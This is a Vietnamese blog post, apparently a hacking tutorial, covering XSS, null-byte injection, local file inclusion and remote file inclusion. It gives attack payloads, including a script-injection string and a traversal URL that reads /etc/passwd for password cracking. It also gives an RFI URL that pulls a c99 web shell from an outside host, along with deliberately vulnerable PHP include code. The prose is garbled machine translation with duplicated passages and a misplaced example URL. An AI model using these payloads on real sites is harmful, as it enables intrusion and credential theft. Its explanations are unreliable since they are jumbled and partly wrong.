=+=XSS=+=
==>SCRIPT, OBJECT APPLET, EMBED, and FORM
Thông thường attacker sủ dụng ngôn ngữ internet như :Javascript, VBScript, HTML, Perl, or ActiveX.
examples:
<script>document.write("check TrungTruc");</script>
<img src=http://i913.photobucket.com/albums/ac339/trungtruct2/P1000848.jpg" />
Các ký tự NULL là gì khác hơn là ... một giá trị bằng không. Byte Null là các cuộc tấn công vô giá trị, nhân vật thường được đại diện bởi \ 0 hoặc 00%. Nhân vật vô giá trị, tôi nghĩ rằng, lực lượng mã sẽ thoát ra để lại cho chúng tôi với nguồn.
http://www.somesite.com/index.php?page=admin% 00
trên một trang dễ bị tổn thương này sẽ cho kết quả trong chúng ta xem mã nguồn của trang quản trị
PHP, CGI, etc
<?php
include("http://www.somesite.com/" . $_GET['page']);
?>
<script>document.write("check TrungTruc");</script>
<img src=http://i913.photobucket.com/albums/ac339/trungtruct2/P1000848.jpg" />
=+=NULL BYTE=+=
http://www.somesite.com/index.php?page=admin% 00
trên một trang dễ bị tổn thương này sẽ cho kết quả trong chúng ta xem mã nguồn của trang quản trị
PHP, CGI, etc
=+=LFI=+=
LFI là một từ viết tắt cho Inclsion Local File.Thường thì máy chủ lưu các tập tin mật khẩu của họ trên máy chủ của họ trực tuyến, trong một thư mục chỉ linux ==> trong thư mục / etc / passwd .Một khi bạn đã tập tin này, bạn chỉ cần mang nó và crack mật khẩu hoặc bất cứ điều gì bạn cần phải làm với nó.Để có được tập tin, bạn phải đi lại nhiều thư mục đầu tiên.LFI khai thác nhiều như RFI, trong khía cạnh đó cả hai đều bao gồm một trang trong PHP, do đó, các code có thể nhìn một cái gì đó gần như:
<?php
include("http://www.somesite.com/" . $_GET['page']);
?>
Sau khi attack LFI chúng ta có thể trông thấy như thế này
http://somesite.com/index.php?page=../../../../../../../etc/passwd
Sau đó bạn có tập tin mật khẩu, mà thường là vô dụng trừ khi bạn nhận được các tập tinbóng, mà sẽ không có sẵn nhưng điều này sẽ mở một cửa sổ cho nhiều điều.
RFI cũng tương tự như LFI, là viết tắt của Remote File Inclusion. Đối với attack RFI, thì bạn cần 1 file nào đó đã được up lên, chẳng hạn như shell ( c99,r57 ). Thông thường nếu bạn save cái file .php dạng .txt thì trang sẽ thường diễn giải mã và thực hiện các lệnh trong đó. Vì vậy các mã nguồn của trang web khai thác có thể giống như sau
<?php
include($_GET['page'] . '.php');
?>
Sau đó chúng ta sẽ thực thi con C99 như thế này:
http://somesite.com/index.php?page=../../../../../../../etc/passwd
Sau đó bạn có tập tin mật khẩu, mà thường là vô dụng trừ khi bạn nhận được các tập tinbóng, mà sẽ không có sẵn nhưng điều này sẽ mở một cửa sổ cho nhiều điều.
=+=RFI=+=
<?php
include($_GET['page'] . '.php');
?>
Sau đó chúng ta sẽ thực thi con C99 như thế này:
http://www.somesite.com/index.php?page=http://mysite.com/c99.txt?
Không có nhận xét nào:
Đăng nhận xét